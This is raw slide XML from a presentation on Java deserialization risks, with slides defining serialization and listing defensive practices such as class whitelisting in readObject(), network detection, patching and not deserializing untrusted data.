              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serialized objects are recognizable on the network.  IDS and traffic inspecting firewalls can be configured to detect/block them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Runtime Application Self-Protection – Products that hook your server Java engine and monitor/block malicious patterns including deserialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473175" y="4158568"/>
            <a:ext cx="7866484" cy="638176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Overload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27762" y="4682443"/>
            <a:ext cx="7997571" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write a custom function that overloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() and performs safety checking during deserialization (whitelist allowed classes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10353053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Serialization – What is it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serialization is the process of converting a complex object into a representation that can more easily be transmitted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deserialization is the process of recreating the object from that representation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315836068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Best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379392" y="1444146"/>
            <a:ext cx="7866063" cy="638175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Keep Software Updated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" u="sng"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2631" y="1988466"/>
            <a:ext cx="8253176" cy="1303133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327255" y="3690016"/>
            <a:ext cx="7866484" cy="638176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Limit Access to Admin Interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-118158" y="4213891"/>
            <a:ext cx="7997571" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A review of vulnerabilities suggests serialized objects are more commonly used by administrative interfaces.  This is another reason to ensure they are not exposed to untrusted networks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296037564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Best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19456" y="1977140"/>
            <a:ext cx="7997825" cy="3762375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’re at the design phase, consider using an alternate serialization method.  XML, JSON, even YAML can all be validated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>prior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to decoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validate to the extent possible.  Serialized objects have plain-text elements (class names) that could be used for validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application should know which classes it accepts (WHITELIST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First class name should appear in a consistent location</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531543" y="1424690"/>
            <a:ext cx="7866484" cy="638176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t> untrusted data!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255629691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smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340480" y="1478389"/>
            <a:ext cx="7626350" cy="4095750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deserialization allows instantiation of ANY class in your code tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instantiation doesn’t “usually” lead to code execution, but you’re in an arms race with many creative attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be EXTREMELY cautious about using serialized objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be vigilant watching for deserialization pathways in 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party code/applications/languages.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
